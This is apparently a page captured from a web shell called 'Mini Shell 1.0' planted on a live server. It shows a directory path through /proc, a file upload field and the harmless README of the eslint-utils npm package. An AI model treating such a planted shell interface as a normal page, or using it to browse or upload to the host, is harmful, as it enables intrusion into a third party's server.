HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/1991109/root/usr/share/doc/node-eslint-utils/
Upload File :
Current File : //proc/1991109/root/usr/share/doc/node-eslint-utils/README.html
<h1>eslint-utils</h1>
<h2>🏁 Goal</h2>
<p>This package provides utility functions and classes for make ESLint custom rules.</p>
<p>For examples:</p>
<ul>
<li><a href="https://eslint-utils.mysticatea.dev/api/ast-utils.html#getstaticvalue">getStaticValue</a> evaluates static value on AST.</li>
<li><a href="https://eslint-utils.mysticatea.dev/api/scope-utils.html#referencetracker-class">ReferenceTracker</a> checks the members of modules/globals as handling assignments and destructuring.</li>
</ul>
<h2>📖 Usage</h2>
<p>See <a href="https://eslint-utils.mysticatea.dev/">documentation</a>.</p>
<h2>📰 Changelog</h2>
<p>See <a href="https://github.com/mysticatea/eslint-utils/releases">releases</a>.</p>
<h2>❤️ Contributing</h2>
<p>Welcome contributing!</p>
<p>Please use GitHub's Issues/PRs.</p>
<h3>Development Tools</h3>
<ul>
<li><code>npm test</code> runs tests and measures coverage.</li>
<li><code>npm run clean</code> removes the coverage result of <code>npm test</code> command.</li>
<li><code>npm run coverage</code> shows the coverage result of the last <code>npm test</code> command.</li>
<li><code>npm run lint</code> runs ESLint.</li>
<li><code>npm run watch</code> runs tests on each file change.</li>
</ul>